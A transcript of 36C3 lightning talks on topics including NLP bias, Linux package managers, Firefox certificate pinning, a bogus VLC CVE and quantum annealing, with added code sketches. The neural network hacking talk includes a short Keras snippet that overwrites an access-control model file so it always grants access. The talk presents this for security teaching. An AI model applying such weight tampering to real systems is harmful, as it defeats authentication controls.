fluid. It changes, people use more than one language usually, and generally speaking we don't really know how language works. So let's exemplify that. This is a fairly easy sentence: they saw a vet with a telescope. Now, first of all, "they" could be singular, could be plural, we don't really know. A vet could be a veterinarian, a doctor, or it could be a veteran, a soldier for example, or a pirate, I don't know. So what could we do here? Well, it could be that they saw a vet with a telescope, where the vet owns the telescope. Could also be that they saw that vet with their own telescope. And finally, it could also be that they saw a vet, they went to a doctor's office, and apparently that doctor had a telescope. So, okay, try to parse that. It's pretty tricky. For humans it's fairly easy if we have enough context. So let's look at some more challenges that we have to face in doing NLP. Languages matter. Most people speak more than one language, and not many people speak only their standard variety. People mix and match languages on an everyday basis, and we have to consider that. Context matters. If we see that vet, we know whether it's a soldier, whether it's a doctor, or whether it's something completely different.
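Just to illustrate how an off-the-shelf tool handles that vet sentence: a dependency parser has to commit to exactly one attachment for "with a telescope". Here is a small, hedged sketch with spaCy, assuming the small English model has been downloaded; whichever head the parser picks for "with", the other readings are silently thrown away.

```python
# pip install spacy && python -m spacy download en_core_web_sm
import spacy

nlp = spacy.load("en_core_web_sm")
doc = nlp("They saw a vet with a telescope.")

# Print each token with its dependency label and its head. The interesting
# token is "with": its head tells us which attachment the parser committed
# to (the seeing event, the vet, ...), and the other readings are gone.
for token in doc:
    print(f"{token.text:10} {token.dep_:10} head={token.head.text}")
```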
Data matters, both in terms of privacy and in terms of the data and the corpora that we use for NLP. And we need to be very aware of the fact that the data that we use to train our systems has an impact on what we are able to do, and also on the results that we get. And finally, hidden biases matter. That could be a translation system that guesses gender based on job titles, that could be a sentiment analysis system that judges sentiment based on names and has maybe a racial stereotype built in. And these are all things that we see in the systems that we have available currently. So if we have all of these issues, what are the potential consequences? Well, first of all, it could be just bad user experience. You talk to your Alexa, Alexa doesn't understand you because you are not an old white man on whom the data has been trained, right? That could be a case. But it could also be that these systems generate false and potentially dangerous results and conclusions, and that could be an actual problem, maybe just for business cases, but essentially also from an ethical standpoint this could be a really big issue. Also, we have a marginalization of languages and speakers, because for some reason we still equate natural language with English. Most models that we have are English, some are German. And depending not so much on how many speakers a language has, but rather on how much money the speakers of that language have, the models are better or worse. That's a sad state that we are in. And lastly, many of these models are reproducing and reinforcing social norms and stereotypes, and we have to be extremely aware that this is happening and that this could be, or is, an actual issue that we are facing on an everyday basis. So what can we do? Well, we should at least consider these things, and we should try to build language models that are aware of these issues. And we should try to go back to including context in our models. And we should be aware of the fact that there is not just English, but there are many languages, and that most people speak more than one language, and we have to consider that, and that it's maybe unfair to force someone to use just one language instead of all the languages that they have available. And that's basically it, a call to action. Solutions are very hard, but language is very hard, and we have to embrace that complexity if we really want to do natural language processing in a way that is not just future proof, but that is also fair in terms of stereotypes, and fair in terms of treating people as who they are, in terms of the languages that they speak and the languages that they want to speak. Thank you. Thank you. Next up is rebuild: hack a better programming language. So, hi. Yeah, we heard about a lot of languages now. So whether we want to build drivers or process natural languages, I think programming languages are serving us very well. And they more and more become a tool: we not only instruct computers what they have to do, but we also express our ideas and understandings of the world in programming languages. So I think even though languages are good, we can do much better. That's the rebuild language project. We want to hack a better programming language. And so, what are our goals? It has to be at least as fast as C. We want to have fun, so we skip all the legacy. And one of the major goals is that we want to make it more accessible. We want to include everybody, want to make them able to hack.
And what are the concepts now? I cannot express or convince you in five minutes of what the programming language or the project is about. We have a lot of ideas, we have very high motivation, and the one good thing is we have persistence, so we keep on. What I now want to do is set a hackable programming language in contrast to commercial programming languages and also academic languages. They have certain valid concepts, but I think getting a hacker perspective into that language realm is really important. So we have to use our weaknesses as a strength and keep it stupid simple; that's the main hacker culture thing. And we also keep it hackable. Hackable really means, for example, that we want to have translatable error messages, or diagnostics that are not only processed by humans but also by tools. That is very easy to do, but almost no programming language we use today does it. Now to one of the more involved concepts I am experimenting with today. The main concept is to use compile-time code execution as the main driver for the language. If we have that, we can basically replace everything else. For example, we can skip all the keywords. That way we can make the programming language more accessible, because everybody can define their own keywords however they want, in the language they need, the language they know. So it's more accessible for people who don't speak English, or kids who cannot speak English yet but want to learn programming and learn the concepts. The other thing is, when we have no keywords, how do we do anything in the language? The main idea right now is to have an interactive compiler API. What you do, basically, is that when the program compiles, you talk to your compiler: please declare a variable, create a function, make a class, whatever is needed. So instead of using a keyword for that, you just call an API at compile time, and the compiler does what you request it to do. These are the main ideas I'm experimenting with right now, but there are a lot more involved, more ideas I want to explore. And that's basically the call to action here: let us, as hackers, create a more accessible programming language. Thank you for your attention. You can find the experiments on GitHub, and I also created an RFC repository, request for comments, where I try to write down ideas and then explore them in the real compiler. And if you don't want to contribute code or ideas, then you can at least follow the rebuild GitHub or Twitter account. Thank you for your attention. Thank you. All right. Next up is open cultural data is out there. Hello, I'm here today to share my enthusiasm about open cultural data with you, and to infect as many of you as possible with this enthusiasm. Many of you are probably familiar with the fact that libraries, museums and archives worldwide are digitizing their collections in high quality, systematically and in large numbers, and many do it in such a way that the data can be used, in terms of licensing and law and also technically. And that is not necessarily just about paintings.
There are, of course, also maps, prints, three-dimensional objects from sculptures to coins and so on, manuscripts that are hundreds or thousands of years old, things with very different content that can be analysed in very different ways, as well as audio and video material, material from the natural sciences, films, whatever. A huge trove of data is being built up and prepared by these cultural institutions. In the past, many of them did this in a way where the data was presented in digital display cases that you could only look at, but increasingly these institutions make APIs available through which you can dig into the data, do research, and also process the data in large quantities. Here, for example, the Metropolitan Museum in New York or the Rijksmuseum in Amsterdam provide their own APIs, through which you can access their complete collections and process them with your own software. Many other institutions have set up generic APIs. A little older are OAI-PMH or SRU, which are based on XML and HTTP; a bit more modern is, for example, the International Image Interoperability Framework, IIIF, which is based on JSON and JSON-LD, so it is linked data, which means you can also connect it very well with other data sources and network these data sets together. Moreover, IIIF offers the possibility to query the data dynamically, so you don't always have to pull the complete large images, but can, for example, pull only cutouts or smaller variants directly from the image servers into your own web applications. There are incredibly many sources on the internet, and I have structured my presentation a little bit so that it is also a small link collection into this whole world of cultural data, for example a few starting points for working with IIIF, among others the Internet Archive. I think that one is not public yet, but you can find it via their test server, which can also be queried via IIIF. There are also connections, for example, to European and German digital libraries, where the data and metadata collections can then be researched at a more aggregated level, again via APIs. What can you do with such data? The obvious thing, of course, is to simply display the data or make it accessible through a search. But you can also create new tools, tools for art or design that build on these images, which today are often in the public domain or at least prepared as Creative Commons licensed data. You can also use artificial intelligence and machine learning methods to generate new art, create fun applications, or seriously inform about the past; all of that you can do with this data, with these treasures. A good opportunity for that are, for example, the Coding da Vinci hackathons, which have been taking place for a few years now. Cultural institutions prepare data specially for these hackathons, but it remains available permanently, and interested people work with the data and create new applications and art, meaningful things, games, whatever you can do with it in this context. Thank you for your attention. I hope the slides with the links can be downloaded at some point, and you are also welcome to talk to me directly. Thank you. Thank you. So, if you want your slides to be available, speakers, please upload them in the submission system as a resource. Then everybody can see them, they are public and can be downloaded.
So we're going to have our last talk for this session. I'm sorry for the people on the waiting list; we are back on time and don't really have space for another talk. So I'm sorry, but maybe see you next year. So this is the last talk: Kaboom, a cruel but fair Minesweeper. Hello, everyone. I want to talk about a really cool project that I did recently and really enjoyed. So this is a Minesweeper game. You've probably all played Minesweeper, but just to remind you: this is a game where there's a number, and this is the number of adjacent cells with mines. You have to uncover the cells without mines; if you hit a mine, you die. And of course, as you know, you can play this game using logic, or you can guess. And sometimes you are even forced to guess, because there are, like, two different possibilities and you cannot just reason about which one is correct. So this sucks a bit, I would say. So recently I had an idea: what if the computer cheated? You might not know this, but the default Windows Minesweeper already cheats. You know how the first square is never a mine? If you play somewhere and it would be a mine, then the computer moves the mine around and basically invents a new placement for you. So what if there was never any placement in the first place? Nothing is predefined, and when you play, we just invent a maximally inconvenient placement for you. Basically, if a square can contain a mine, it will contain a mine. So you have to be really careful, use logic, reason, and basically prove that a square doesn't contain a mine before playing it. In a sense, you could say that this Minesweeper is a full-information game that you play against the computer, like chess, for instance. So this is how it looks. On the left, you see the cells, and you can see that some cells are safe, these are the dots. Some are dangerous, basically they are guaranteed to contain a mine, that's the exclamation mark. And some are question marks: there could be a mine, or it could be empty. And you have to play a safe cell. If you play a question mark, then magically a mine will appear there, just because it can. The one exception is that sometimes you are forced to guess because nothing is safe, and then we allow you a guess, and basically you can influence your future, because wherever you play, whichever question mark you play, you will uncover an empty square. So the implementation looks like this. Basically, we have to consider only the boundary of the revealed cells; the outside is not important, other than for the total number of mines. And at this boundary, we just compute all the possibilities using a backtracking algorithm and combine them. You can see on the right-hand side that some of the squares are guaranteed to have a mine, some are guaranteed empty, and some are neither. So this was my first implementation, but unfortunately it was too slow. And yeah, this way you can basically fill up 12 gigabytes of memory, even though the arrangement is supposed to be pretty simple. So probably we need something better, because as you can see, the situation on the board is actually not so complicated, and if you were a human, you could probably say a lot about the situation. So I decided to use a SAT solver, which is basically a tool for mathematically checking whether a mathematical formula can be satisfied.
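As a taste of what that looks like in code, here is a small, hedged sketch using the python-sat package. The real Kaboom runs in the browser, so this is only an illustration of the encoding idea, with a made-up two-constraint toy board rather than a full game.

```python
# pip install python-sat
from pysat.card import CardEnc
from pysat.solvers import Glucose3

# Toy board: variables 1..4 are unknown cells on the boundary.
# A revealed "1" touches cells 1,2,3; a revealed "2" touches cells 2,3,4.
constraints = [
    ([1, 2, 3], 1),   # exactly one mine among cells 1, 2, 3
    ([2, 3, 4], 2),   # exactly two mines among cells 2, 3, 4
]

clauses = []
top = 4  # highest variable id so far; the encoder adds auxiliary variables
for cells, count in constraints:
    enc = CardEnc.equals(lits=cells, bound=count, top_id=top)
    clauses.extend(enc.clauses)
    top = enc.nv

def classify(cell):
    # Ask two questions: can this cell be a mine, and can it be free?
    with Glucose3(bootstrap_with=clauses) as solver:
        can_be_mine = solver.solve(assumptions=[cell])
    with Glucose3(bootstrap_with=clauses) as solver:
        can_be_free = solver.solve(assumptions=[-cell])
    if can_be_mine and not can_be_free:
        return "mine"        # the exclamation mark in the game
    if can_be_free and not can_be_mine:
        return "safe"        # the dot
    return "unknown"         # the question mark; Kaboom will punish a click

for cell in range(1, 5):
    print(cell, classify(cell))
```

With this toy input, cell 1 comes out as safe, cell 4 as a guaranteed mine, and cells 2 and 3 stay unknown, which is exactly the three-way classification the game shows.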
So on the right, you can see such a formula. If you have three squares, each of them can be zero or one, and their sum has to match the number. And basically, our whole board is a set of formulas that say that, well, exactly n of the surrounding fields have to be mines, or that in total there have to be exactly M mines. And basically, now we can prove things mathematically about the game. I still need to do some tricks to cache the results, but overall it's pretty fast, it's pretty playable, it will not hang up on you. And that's basically it. Here you can see the game. It should work on a computer and also on a mobile system. You can go through this link or you can just Google for it, the name is Kaboom. And you can also read a blog post, because this is a pretty short talk, but actually I had a ton of different adventures developing this game, and it was a pretty deep rabbit hole. So thank you very much. Keep playing, and I would appreciate any feedback about this. Thank you. All right. So this concludes this year's Lightning Talk sessions. Thank you all for being here. Please give a big round of applause for all of the speakers who participated.
Lightning Talks are short lectures (almost) any congress participant may give! Bring your infectious enthusiasm to an audience with a short attention span! Discuss a program, system or technique! Pitch your projects and ideas or try to rally a crew of people to your party or assembly! Whatever you bring, make it quick! To get involved and learn more about what is happening please visit the Lightning Talks page in the 36C3 wiki.
10.5446/53218 (DOI)
Good morning everybody. So I think everyone here should by now know how it works. For the first four minutes of your five minute talk, the timekeeper shows a green signal, a green rising LED bar and then the four minutes are nearly up. It will look like this. And then you have 30 seconds of yellow light, something like this. And the last 30 seconds of your talk are shown in red. And when it's about this height, I need your help and you have to make up for all the people still in bed. So give me please a countdown with five, four, three, two, one. Marvelous. Very nice. But I think we can do better. Let's do it again. Do we want to try it again? I don't know. No. We don't have to. That's good. I always have it in the slides. Okay. Great. So we also have translations available. Very important. So if you, since some of the talks are German, you might need a German to English translation. And most of the talks are English. You might need a German translation from English to German. And we also have French translations from English to German, from English to French, and from German to French. So just look up streaming.c3lingo.org where you can see the translating streams. All right, then let's go with the first talk. So first up is where trust ends certificate pinning for the rest of us. Yes, hello. Good morning, everyone. My name is Harikus and I have brought a question, an answer, a problem, and a solution with me today. The question is why do I usually trust the web today and why that is sometimes not good enough? So the easy answer is, well, I usually trust the web today and most of you do as well because when you go to HTTPS encrypted web pages, they're encrypted and you implicitly trust certificate authorities to only hand out signatures for certificates only to the owner of the domain and not to anyone else who wants to do a man in the middle attack. So that's what you trust today implicitly. The problem with that for some things is, well, actually, whom do you actually trust? When you go to the certificate manager in Firefox, for example, you can see there is well over 100 root certificates that can be used to sign certificates. So you implicitly trust many, many different entities. For example, the well-known Hong Kong post office, which is, I guess, a running gag. I always thought it was a running gag that you have to trust the Hong Kong post office, but I actually had a look and it's in there. It's in the certificate manager, the Hong Kong post office. So I have to trust them for everything. Well, for most things I think that's good enough for me, but for other things it's not. I don't want to trust 100 root certificates, for example, for my own websites I have at home, for my banking stuff. And what I had until a couple of years ago, there was a nice Firefox add-on that lets one do certificate pinning, which means you pin the certificate that you have one seen and then only this one is trusted. And if there is suddenly a new certificate, you get an information that there is a new one and then you can decide if the change was valid or not. So unfortunately, Mozilla removed this API as part of a big cleansing a couple of years ago and it wasn't possible to inspect the certificate anymore so that add-on went away. And there was nothing for a couple of years. Until back in September 2018, they added a new API to inspect certificates before the web page is loaded. 
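The underlying idea, trust the certificate on first use and raise an alarm when it changes, is simple enough to sketch outside the browser. Here is a minimal, hedged Python illustration of that pinning logic; it is not the add-on's actual WebExtension code, and the pin-store file name is made up.

```python
# Minimal trust-on-first-use certificate pinning sketch (illustration only).
import hashlib
import json
import pathlib
import ssl

PIN_FILE = pathlib.Path("pins.json")  # hypothetical local pin store

def fingerprint(host, port=443):
    # Fetch the server certificate, convert it to DER and hash it.
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest()

def check(host):
    pins = json.loads(PIN_FILE.read_text()) if PIN_FILE.exists() else {}
    seen = fingerprint(host)
    if host not in pins:
        pins[host] = seen                       # first visit: pin it
        PIN_FILE.write_text(json.dumps(pins))
        return "pinned"
    if pins[host] == seen:
        return "ok"                             # same certificate as before
    return "ALERT: certificate changed"         # now a human has to decide

print(check("example.org"))
```

In the browser the same decision has to happen before any request data leaves the machine, which is exactly what the new API makes possible.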
So I thought, okay, cool, then I'll write an add-on for that, to actually inspect the certificate and to pin it, to block it if there is a new one, and to let people inspect that. So that's what the API looks like, and that's what the add-on looks like if you install it, for example via the Mozilla Firefox add-on store. You get a new icon in the browser's toolbar, and when you go to a web page that you want to pin, because you don't trust the 100 root certificates, you get a little green P there, meaning the page is protected. Whenever you go to that page again, or to any other page that you have pinned, the add-on looks at the certificate that has been delivered, and if it's the same, everything goes ahead. But if it's a new and different one, you get an alert, and then you can choose whether the change was fine, for example because you have changed the certificate for your own services. Or, if it was the banking website, you can look at the certificate chain and decide: well, that was probably okay, or maybe there is something fishy. Then you can either go on, or you can stop the process before any of your passwords or private information has been transferred to the other side. All right, and that's pretty much it. If you want to have a look, you can use the barcode here or the URLs down here, have a look at the add-on, and you can have a look at the source code as well, obviously; it's a certificate pinning add-on for Firefox. Thank you. Thank you. Next up is distri. Hello. Good morning. My name is Michael and I think that Linux distributions are too slow. I've measured the time that it takes to install a small Perl script on the major Linux distributions, but this holds true for both smaller and larger packages, and I think it's really unacceptable that on, for example, Fedora, you have to wait 25 seconds to install a couple of kilobytes of program code. So why is it that these package managers are so slow? Well, all of the widely used package formats are actually archives: in Debian you have tar archives, in Red Hat it's cpio archives. And traditionally, what a package manager on Linux does is: it needs to download some global metadata, use it to resolve dependencies, download package archives, extract these archives, and then actually configure the software that was just unpacked onto your computer. On top of that, these package managers need to carefully use the fsync system call to make all of this I/O as safe as possible, so that, just in case your laptop battery dies in the middle of a package installation, your system should still work once you power it up again. Now, in distri, we have removed all of these stages: we no longer need to resolve any global dependencies, we only need to download image files, we don't need to extract anything, we don't need to configure anything, and due to our design we can do all of this using unsafe I/O. This approach scales to 12-plus gigabytes per second on a 100 gigabit link, using just the standard Go net/http package, so more optimization might be possible. If you compare this with the data rates from the previous slide, which were like 1.something megabytes per second, this is a really big contrast. So how can we do this? The key idea is that we're using an append-only package store of immutable images. We're using an image format, for example SquashFS in our case, instead of an archive format. Then each of these images we mount under its own path; this is a concept that we call separate hierarchies.
For example, if you were to install the nginx web server on your system, you would have a path such as /ro, for read-only, and then nginx followed by the fully qualified version number. The same is true for zsh and all of the other components on your system, but the rest of the system is laid out as usual, so you have your typical /etc directory for configuration, /var, and so on and so on. With these separate hierarchies, you might be wondering: okay, but if you have all of these programs installed separately from each other, how can they still communicate? Because programs do use exchange directories that have a well-known path. For example, if you use your man page viewer to look at the nginx documentation, it looks up a file within /usr/share/man. And if you're using your C compiler to compile against libusb, it looks into /usr/include, et cetera. In distri, we just emulate these well-known paths, so we have a symlink, for example within /usr/include, which points to the fully qualified file. The advantages of using separate hierarchies are that all of the packages are always co-installable. For example, if you upgrade from zsh 5.6.2 to a newer version and it breaks your config file, you can easily just use the older shell, or remove the new one, without breaking the rest of your system. But more importantly, this means that the package manager can be entirely version agnostic, so we no longer need to fetch global metadata from the internet and resolve all of these dependencies. So a large source of slowness in installation and upgrades is just entirely eliminated. Furthermore, we don't have any hooks or triggers in distri. A hook is also sometimes called a maintainer script or a post-installation script; essentially, it's a program that is run after a package was installed. A trigger is the same thing, except it's a program that is run after some other package is installed. For example, the man package in Debian builds a full-text search database of all of your man pages whenever you install any package that has a man page, so almost all the time. I personally never use this, and I bet most of you haven't even known that it existed. So the work that it is doing at package installation time is entirely unnecessary for most of us. More importantly, having hooks in your architecture precludes concurrent package installation, because these hooks were not implemented with concurrency in mind. And also, they can be slow, because nobody checks what the package maintainers are actually shipping in these programs. The claim that I'm making is that we can build a fully functioning Linux system without having any hooks or triggers in it. The approach that we're taking to get there is twofold. The first idea is that packages just declare what they need. For example, if you have a daemon such as the nginx web server, it might say: I need a new system user so that I can safely run the program as this user. And if you have one of the cases where it really doesn't make sense to implement a facility with which packages can declaratively say what they need, then you can still move the work from package installation time to program execution time. For example, for the SSH server, where you need to generate a host key, you can just create it in the sshd wrapper script instead of creating it at package installation time, which is also good for read-only images.
So, the conclusion is that an append-only package store is more elegant than a mutable system, and it results in a simpler design and a faster implementation, so it's a win-win. Using the exchange directories, where, as I mentioned, we have the symlinks for compatibility, makes things seem normal enough to third-party software, so we can compile and package software and we can run closed-source binaries, no problem. All of the ideas that are presented are practical; live CDs have paved the way with their read-only environments and cross-compilation. I'm not trying to build a community or user base here: distri is a research project. I want to encourage you all to not accept slow Linux distributions. I just want to raise the bar and say it can be much, much faster. So, thank you, and check out distr1.org. Thank you. Next up is hacking neural networks. Hi, all. My name is Michael and I'm working on a small open source course on how to hack into neural networks. Why should IT security care about such stuff? For example, there are a lot of deep learning applications now in blue team applications such as anti-virus and intrusion detection systems. But obviously, red teams also need to know how to hack into those systems, and they also need to create their own systems, such as automated penetration testing or phishing email generators. And there is of course all this questionable stuff that you might think is a valuable target, such as mass surveillance and crime forecasting. First, I'll give a short review of the terminology I'm going to use and of what neural networks do. Here's a typical neural network. It will take an image from the left side, perform some math on it, and produce an output, such as: is this image a cat or a dog? It does this by performing a simple mathematical function on each of its neurons, and this mathematical function consists of weights, which are multiplied by the inputs, and a bias which is added. All this is fed into an activation function, for example, here, the ReLU activation function. For example, let's take an access control system based on an iris scanner. It takes an image of an iris from the left, computes what we just saw, and outputs whether access is denied or access is granted, depending on the output value. And this output neuron performs the same computation as all the other neurons, usually with something called a softmax, but we'll just stick with ReLU. So the question now is: how can we modify this so that we will always get access granted from the neural network? Well, it's quite obvious: we can simply replace all the weights with zero and set the bias to one. Then, no matter what iris we feed the neural network, it will always give us access granted. How can we do this in real life? The neural network is usually stored in something called a model file, which we can simply edit. Is this realistic? Yes, it's actually quite realistic, because most blue teams don't know how to secure these model files: they are neither code, they don't seem to be a database, and they don't seem to be a configuration file. They're mostly huge, gigabytes in size, and the dev team needs constant write access to them. So it seems kind of hard to secure this in a reasonable manner, and you will very often find that they are quite easily accessible.
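To make that first attack concrete, here is a hedged sketch of what editing such a model file can look like with Keras. The file name and layer layout are made up, and this is not the course's actual exercise code; the point is only that write access to the model file is all that is needed.

```python
# pip install tensorflow
import numpy as np
from tensorflow import keras

# Hypothetical access-control model stored on disk next to the application.
model = keras.models.load_model("iris_access_control.h5")

last = model.layers[-1]                 # the layer producing the decision
kernel, bias = last.get_weights()       # weight matrix and bias vector
last.set_weights([
    np.zeros_like(kernel),              # all weights to zero ...
    np.ones_like(bias),                 # ... and the bias to one
])                                      # the output is now constant

model.save("iris_access_control.h5")    # overwrite the file in place
```

After this change the scanner will report access granted for any input, which is exactly the behaviour described above.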
Of course there are other methods we can use. As a second example, we can perform a GPU buffer overflow. For image processing we often find that the pre-processor for the image is also running on the GPU, where the neural network is calculated, so you might find a GPU memory layout as shown here. And if we simply don't have any bounds checks on the image, we can of course overflow the buffer, and we can overwrite the whole model and simply set all the weights to zero and only the last bias to one. So is this all realistic, can we actually do this? Yes, you can. If you want some details, you can just follow this link, where I have a whole article explaining over 10 methods, and you will be able to try them all out in different exercises, such as backdooring neural networks or how to do a neural malware injection, and of course all the stuff I just showed you here. Thank you. Thank you. So next up is the cross-site request forgery side channel. Hi. Hello, good morning. This is not about presenting a shiny new fancy bug, but more about talking about the non-interesting bugs, so don't get your hopes up. Basically, I want to get some feedback from the community on how to deal with them. I guess most of you know cross-site request forgeries: when a user is logged into a web page, he has a valid session, and another web page tries to lure him into clicking a button or something that then sends a POST request to the original web page, which would then execute something the user does not want. Usually you protect against this by using cross-site request forgery tokens, and all the standard frameworks like Angular or Laravel send them along with DELETE or POST requests. But the RFC does not define them for GET requests, and this opens a side channel. If you can monitor network traffic, you can see what resources the user is able to access, by seeing whether the user gets a big response with data or a small response with access denied. So this allows you to map the permissions of different users if you have access to the same Wi-Fi, for example. This is not highly classified information, but a side channel that might be interesting in some corner cases. I talked to the Angular people, and for them it's like a non-issue: the standard says they don't have to do it, so they don't. But the question I want to ask here is: how should we deal with this as a community? Should we just ignore those things? Should we carry third-party patches in our own source code to fix this stuff? Are there any other ways we should handle this? For this special case you have several options for how to deal with it, but what I'm interested in hearing from you is how we should deal with this politically. For the fancier issues you can always pressure the vendor into fixing stuff, but for those minor issues you can't, and I don't think we should. So yeah, please give me your feedback on what you think about this. Thank you. Thank you. All right, next up is Emissions API. Good morning. Good morning. I'm Lars. I want to talk about an open source project I'm involved in, which is called Emissions API, and which is about making emissions data from satellites easier to access than just getting binary data blobs from ESA. So this doesn't work. Ah, I think now it works. So, we are talking about this thing here: this is the Sentinel-5P satellite by the European Space Agency. It's part of their Copernicus programme, and it's orbiting Earth and gathering data about several emissions, like for example methane, carbon monoxide, sulfur dioxide, and so on and so forth. The cool thing about this is that all these data are open.
However, the problem with open data, as so often, is that open data does not always necessarily mean that the data is easy to access. It is a little bit pre-processed, which is nice, but you also get large binary blobs from ESA. So for example, if you want to get data for Leipzig here, you would also get data for Antarctica, which, well, you don't really want or need. And the other problem is that what you get are large blobs of binary data, so it's nothing you can easily process, at least not as part of a web application. This, for example, is a single scan of basically the Earth, so one flyover of Sentinel-5P, and you see this is the data you would get in one file you download. You would get basically all of the world's data and couldn't get something for a single spot. The actual scan looks a little bit different: this is a representation of a single scan line flying here over Germany, and it would be really nice to get just some parts of this, and this is what we strive to do with the project. Looking at the architecture, we want to make this as easy to access as possible, so we have a simple REST API where you can just say: okay, I want to have data for this point, this geolocation, or for this area, and you just get back JSON, either GeoJSON or some statistical information in JSON format, which you can then use in any web application you want. We've built some example applications already, so if you go to our website, emissions-api.org, you can for example see this example, which is the carbon monoxide emissions of Germany over one month, including a little guide on how to build this. A little bit cooler would be something like this: this is using WebGL and shows a 3D representation of the carbon monoxide over Germany. We're still limited to carbon monoxide so far; we started this project about three months ago and we hope to get this more or less done in about another three months, hoping to increase the number of supported data products a little bit and the overall time coverage a little bit. But there's already an API to talk to out there and some examples. So if you're interested, go to emissions-api.org or find me or some of the other developers here at the Congress and talk to us about this. Thank you. Next up is EXWM. So my name is Alice. I'm a long-time Linux and free and open source software user overall. I've been using Emacs for more than 10 years, and NixOS for a couple of years. I'm also a ham radio operator. I'm here today to talk about what EXWM is anyway, my experience with EXWM, and the future of EXWM. So, EXWM is just Emacs running in full screen, managing your graphical applications. That's it. And this has benefits and disadvantages, so both good and bad. My experience with EXWM began with it being unimpressive and boring. I'm going to show you a screenshot. This is EXWM when it's freshly started. It's with my Emacs theme, and it's just Emacs without window decorations or borders, in full screen. But over many years of using Emacs I have grown very used to the key bindings and the way you manage buffers, and very comfortable using it, which makes it exciting when you have it as a window manager. So here I'm running a bunch of graphical applications. And this is the thing: all the key bindings used for managing Emacs translate to how you manage graphical applications within EXWM.
So you use the same key bindings when you manage graphical applications as you do when you manage projects or code, or do just normal editing, or run your terminal within Emacs. Overall it's been quite a good experience. Most things work. It's not the best window manager I've ever used, it has bugs, plenty of them, and yes, everything does, more or less. Then we come to the future of EXWM. It doesn't really exist, because the future of the Linux desktop is probably Wayland, as most of us probably think, but we're not there yet. And EXWM has a few problems with that future. One of the problems is that Emacs doesn't even run on Wayland yet. There is a branch for it, so we might get there someday. But then we have the other big problem that Wayland requires you to build a compositor, and doing that in Emacs... Just getting it to run on Wayland is probably a good start, then we'll see what happens. The year of the Linux desktop might not be this year, might not happen any time soon, but at least I know many people that are hopeful about it. For me, 2019 was the year of the Emacs desktop as a window manager. And yeah, to conclude, EXWM is a perfectly decent window manager for long-time Emacs users. It can be combined with Evil mode if you want Vim key bindings. The experience is that most often it works well enough for me, so I'm not switching away from it. And yes, the future is dark. You can reach out to me later if you want. Thank you. So next up is uninstall $PRODUCT now. Hello. Good morning. I'm one of the VLC developers. I'm not the security guy, but I know there are some security guys around. What I would like to talk about is that some morning you wake up and you have your mail full of questions, and on the internet the world is burning, because everyone is asking to uninstall your product, and you don't know why. So, it was last July, you probably noticed it. There was this CVE, highly critical, maximum score, remote: a buffer over-read in libebml, which is the library used for MKV. And it was filed by CERT-Bund, which you may know, and it was sourced from one of our ticketing system entries. We had of course no embargo on this, because it was on a public resource, so we were also not contacted, and it was not verified. So yeah, what was it about? Well, when your ticketing entry and your security researcher point at the wrong commit as the cause, it might be something fishy from the start. And when we ask him to post it on our security mailing list, for a reason, he doesn't do it. And also nobody can reproduce it. So he posted it publicly, because we never replied on security, because nobody could reproduce it. And why was it unreproducible? His configuration was libFuzzer on the master source code. He was running Ubuntu, but he was using a vulnerable, unfixed libebml, which was known to be vulnerable. And he did not follow our build instructions, because we use a lot of libraries which sometimes are not maintained, so we have to maintain them ourselves and we ship our own patches, mostly for the OS systems we have to secure ourselves, which are mostly Windows. So this highly critical CVE was totally bogus and already fixed. There's not much left of that CVE entry: it was totally downgraded, it was not reported by us, and it was not remote at all. But the most annoying effect was the web articles, with the recommendation to uninstall right now, which were not checked. And all those clickbait articles were spreading like fire in social media, which was also playing the game.
So the consequence is that the whole team had to fight for two days to put out the fire, monitoring social media and answering all the companies asking us for updates. We still have some people asking about this. We also had some people telling us that we were hiding things, because some people think we are hiding security issues. There were almost no article updates on the web, no apologies. And the reporter walked away with an "I'm sorry about that". That's not a problem, he's a volunteer, so even if it's a beginner's mistake, it's okay. But another effect is that we lost one volunteer in the process. And we had some unexpected effects: we received some direct complaints about VLC being blocked from that day on. We discovered that some antivirus and proactive security software are based on CVEs, so with a bogus CVE, you have your product blocked everywhere those products are used, and you need to update the version in the signature. So you have a DoS. This was really unexpected for us. Maybe someone could exploit this, I don't know, but this needs to be changed. So the lessons we took: we enforce no more public security tickets, we will delete them immediately, and we are in the process of becoming a CNA, a CVE Numbering Authority, for the multimedia projects we support, so we can manage that kind of issue in the future. Well, thank you. Thank you. Could you please put the clicker back? I think you still have the clicker, right? Do you still have the clicker device? Okay. Sorry. It looked like you went away with it. No problem. So next up is doing quantum computing with school kids. So good morning, everybody. My name is Rene. I'm a teacher, and I'm here to talk about doing quantum computing with school kids, especially about the project that my three students have worked on this year. So let's start with a question. If the clicker works, then the next slide should come up. Maybe a bad time for the battery. Time is running. Okay, I can continue just talking a little bit. Let's start with a question: who of you has already worked with a real quantum computer? Can I see some hands? Okay, that's not so many, as expected. Maybe it's because you are afraid of the mathematics. So here are some companies that provide you access to a quantum computer, for example D-Wave to a quantum annealer. But maybe you haven't worked with such machines because you're afraid of the quantum physics that's behind quantum computing, or you are afraid of the mathematics, dealing with complex numbers, solving the time-dependent Schrödinger equation, or you think quantum computers are only for super intelligent nerds and you don't have the right t-shirt for that yet. Okay. So if we talk about a quantum annealer, all this is, like Donald would say, fake news. It's definitely not so complicated. All you have to do is find a cost function for a given problem, because a quantum annealer solves optimization problems, like the travelling salesman or scheduling problems. So when you have this cost function that evaluates your problem, then you have to create a matrix from this cost function, feed it to the D-Wave quantum annealer, and this machine will return you several solutions, from which you pick the ones with the lowest costs. So let me explain this on a concrete problem, the one my students worked on, the n-queens problem. Here you have to place n queens on an n times n chess board so that no two queens threaten each other. The constraints you have to meet are, for example, that in each row there has to be exactly one queen.
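To give a feeling for what "create a matrix and feed it to the machine" means in practice, here is a small, hedged sketch using the dimod package from D-Wave's Ocean SDK. It encodes just one toy constraint, "exactly one of three qubits is 1", and solves it exactly on a normal computer; it is not the students' actual n-queens code, and on the real annealer you would swap the sampler for the D-Wave one.

```python
# pip install dimod   (part of D-Wave's Ocean SDK)
import dimod

# Cost for one row of three fields: (q0 + q1 + q2 - 1)^2.
# Expanding the square, and using q*q = q for binary variables, gives a
# linear term of -1 per variable, +2 per pair, and a constant offset of +1.
Q = {
    ("q0", "q0"): -1, ("q1", "q1"): -1, ("q2", "q2"): -1,
    ("q0", "q1"): 2, ("q0", "q2"): 2, ("q1", "q2"): 2,
}

bqm = dimod.BinaryQuadraticModel.from_qubo(Q, offset=1)

# ExactSolver enumerates every assignment, which is fine for toy sizes and
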